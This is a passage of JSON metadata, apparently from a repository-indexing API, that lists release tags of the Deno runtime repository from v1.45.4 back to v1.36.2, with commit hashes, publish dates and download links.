ries/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2"